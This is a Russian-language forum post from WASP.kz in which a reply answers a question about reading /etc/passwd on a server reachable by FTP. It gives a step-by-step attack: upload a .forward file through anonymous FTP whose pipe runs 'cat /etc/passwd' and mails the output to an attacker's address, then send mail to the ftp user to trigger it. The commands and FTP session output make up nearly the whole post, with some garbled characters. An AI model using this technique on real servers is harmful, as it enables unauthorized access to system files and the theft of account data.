WASP.kz

Прислано Nevillberger 19-06-2024 11:15

Как бы мне, имея FТР-доступ к серверу, прочитать /etc/passwd?

Тебе для этого необходимо выполнить следующий ftp-сценарий со своего сервера

Код

bash# cat myforward_file

"cat /etc/passwd | /bin/mail hacker© mail.ru "

bash# ftp victim.com

Connected to victim.com

220 victim FTP server ready Name (victim.com:hacker):ftp 331 Guest login ok, send you e-mail as password.

Password:

230 Guest login ok, access restrictions apply.

ftp> ls -l

220 PORT command succesful.

150 Opening ASCII mode data connection for '/bin/

Is'. (192.168.1.1, 2335) (0 bytes) total 4

dr-xr-xr-x 2 root operator 512 Feb 28 2000 bin

dr-xr-xr-x 2 root operator 512 Sep 18 2000 etc

drwxrwxrwt 13 root operator 1024 Jul 1 00:55 incoming

drwxr-xr-x 3 root operator 512 Feb 19 10:25 pub

226 Transfer complete.

ftp>put myforward_file .forward

ftp>quit

bash# echo 'You a hacked' | mail ftp© victim.com

В итоге, когда почту отошлют юзеру ftр, выполнится .forward-файл. Если у демона будет достаточно прав для чтения/etc/passwd, то его содержимое придет к тебе на мыло

*

Редактировал wasp 19-06-2024 12:11